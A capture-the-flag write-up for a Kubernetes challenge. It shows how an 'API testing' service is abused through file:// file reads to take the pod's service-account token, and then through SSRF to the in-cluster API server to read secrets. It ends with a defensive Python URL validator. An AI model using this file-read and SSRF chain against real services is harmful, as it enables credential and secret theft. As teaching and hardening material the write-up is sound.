Tags: lfi kubernetes ssrf 

Rating: 4.0

The URL holds an "API testing" webservice, which can execute HTTP requests.
According to the "About" page, the service is hosted using Kubernetes and uses *Kubernetes Secrets*.

We quickly find that the service supports not only the `https://` scheme but also `file://`, and will show us the content of local files (*local file inclusion*).

Accessing `file:///etc/mtab` we find the following mountpoint:

```
tmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime 0 0
```

Getting the content of `/run/secrets/kubernetes.io/serviceaccount/token` we obtain a JWT for the pod's service account, whose payload is:

```json
{
  "aud": [
    "https://container.googleapis.com/v1/projects/intigriti-ctf/locations/europe-west1/clusters/ctf-challenge-cluster"
  ],
  "exp": 1678563987,
  "iat": 1647027987,
  "iss": "https://container.googleapis.com/v1/projects/intigriti-ctf/locations/europe-west1/clusters/ctf-challenge-cluster",
  "kubernetes.io": {
    "namespace": "default",
    "pod": {
      "name": "mailman-6cf46d68fb-68b4q",
      "uid": "27017847-da2f-4b54-aa42-b405826f1b2c"
    },
    "serviceaccount": {
      "name": "mailman",
      "uid": "80dc4673-8097-47a6-b847-917a0cacfbbd"
    },
    "warnafter": 1647031594
  },
  "nbf": 1647027987,
  "sub": "system:serviceaccount:default:mailman"
}
```

We should now try to access the Kubernetes API server.
Add the token obtained above to the request as a bearer token (HTTP header `Authorization` with the value `Bearer xxx`) in the web interface.
The API server is always reachable from within a pod at the domain name `kubernetes.default.svc` ([reference](https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/#directly-accessing-the-rest-api)).

Accessing https://kubernetes.default.svc/api/v1/namespaces/default/ (while using the bearer token) works successfully.
Unfortunately we do not have the permissions to read the secrets of that namespace (https://kubernetes.default.svc/api/v1/namespaces/default/secrets or https://kubernetes.default.svc/api/v1/namespaces/default/secrets/flag).

Maybe the flag is in a different namespace?
By accessing `https://kubernetes.default.svc/api/v1/namespaces` we find the list of namespaces available in the cluster:

```json
["ctf","default","gatekeeper-system","kube-node-lease","kube-public","kube-system","nginx-ingress","secretstuff"]
```

The last one, `secretstuff`, sounds promising. We look at the list of secrets in that namespace at `https://kubernetes.default.svc/api/v1/namespaces/secretstuff/secrets` and find the base64-encoded flag there:

```json
{"flag":"MTMzN1VQezAyODMzOTQyODNiODFmZjMwNzgwYzlmMWVmNTYyODQ1fQo="}
```

which decodes to **1337UP{0283394283b81ff30780c9f1ef562845}**
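The whole chain hinges on the "API testing" service forwarding any URL the user supplies, including `file://` paths and the in-cluster name `kubernetes.default.svc`. As an added example (not code from the challenge or the writeup), here is the kind of target check such a service should apply before issuing a request; the hostname lists are assumptions about typical cluster DNS names, and the caller is assumed to resolve the host and re-check the resolved address before connecting.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed in-cluster name patterns: Kubernetes service DNS (kubernetes.default.svc,
# *.svc.cluster.local) and common internal suffixes. Adjust for your cluster.
INTERNAL_SUFFIXES = (".svc", ".cluster.local", ".local", ".internal")
INTERNAL_HOSTS = {"localhost", "kubernetes", "kubernetes.default"}


def is_safe_target(url: str) -> bool:
    """Allow only http(s) URLs aimed at a public host.

    Rejects non-HTTP schemes (closes the file:// read), cluster-internal
    service names (closes the hop to the API server) and non-global IP literals.
    Caveat: a public name can still resolve to an internal address, so the
    caller must resolve the host and run the IP check again on the result.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False
    # IP literal: only globally routable addresses pass (loopback, RFC1918,
    # link-local and reserved ranges are all rejected by is_global).
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        pass  # not an IP literal, fall through to hostname rules
    if host in INTERNAL_HOSTS or host.endswith(INTERNAL_SUFFIXES):
        return False
    # A single-label name is completed by the pod's DNS search domains
    # (e.g. default.svc.cluster.local), so it always points into the cluster.
    if "." not in host:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample: the URLs used in the writeup plus one public target.
    for u in ("file:///etc/mtab",
              "https://kubernetes.default.svc/api/v1/namespaces",
              "https://example.com/api/v1/ping"):
        print(f"{u} -> {'allowed' if is_safe_target(u) else 'blocked'}")
```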